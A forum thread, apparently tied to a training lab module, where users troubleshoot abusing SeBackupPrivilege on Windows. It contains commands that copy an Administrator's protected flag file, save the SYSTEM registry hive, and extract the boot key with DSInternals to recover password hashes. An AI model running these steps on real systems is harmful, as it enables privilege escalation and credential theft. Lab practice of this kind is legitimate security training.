Hi. In module writed about privilege escalation through SeBackupPrivilegeCmdLets.dll that imports with command Import-Module .\SeBackupPrivilegeCmdLets.dll. But on victim machine it replies:
-
+ "Import-Module : Could not load file or assembly
'file:///C:\Users\svc_backup\Downloads\Debug\SeBackupPrivilegeCmdLets.dll' or
one of its dependencies.
Operation is not supported. (Exception from HRESULT: 0x80131515)
+ At line:1 char:1
+ Import-Module .\SeBackupPrivilegeCmdLets.dll
+ CategoryInfo : NotSpecified: (:) [Import-Module], FileLoadException
+ FullyQualifiedErrorId : System.IO.FileLoadException,Microsoft.PowerShell.Commands.ImportModuleCommand"
I ve rebuilded project with .NET 4.8 but nothing changed. Tries of import with admin powershell -exec bypass. Am I missing something obvious?
Is anyone solved this section?
Hey its most likely because you were trying to write the file to a directory where you don’t have permissions, I was doing the same thing. If you have done the other steps correctly you can use this:
Copy-FileSeBackupPrivilege ‘C:\Users\Administrator\Desktop\SeBackupPrivilege\flag.txt’ C:\Users\svc_backup\Desktop\Contract.txt
This will copy and rename the file to the desktop of svc_backup. Then navigate there and ‘cat’ or ‘more’ the file. you should be good from there.
how you solve it???
never mind i found the dlls inside tools folder
1 Like
Anyone managed to resolve this module using DSInternals? Every time I try to get the bootkey I get an error
PS C:\temp> reg save hklm\system system.save
The operation completed successfully.
PS C:\temp> $key = Get-BootKey -SystemHiveFilePath C:\temp\system.save
Get-BootKey : Requested registry access is not allowed.
At line:1 char:8
+ $key = Get-BootKey -SystemHiveFilePath C:\temp\system.save
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : OpenError: (:) [Get-BootKey], SecurityException
+ FullyQualifiedErrorId : GetBootKey_OtherError,DSInternals.PowerShell.Commands.GetBootKeyCommand
I know I can recover the hashes using other techniques, just wanted to test DSInternals way.
I hit this too. Am no expert but having a look at the DSinternals code I think it uses RegLoadKey from advapi. So the tool relies on loading the dumped hive in to the registry of the host you are auditing from to read from it. This could be a problem if you are just Backup Operator as no write access to HKEY_USERS where it tries to load the thing?
It certainly works if you get a copy off to a host you are admin on…
Annoyingly if you hit this issue the tool also removes your SeBackupPrivilege permission 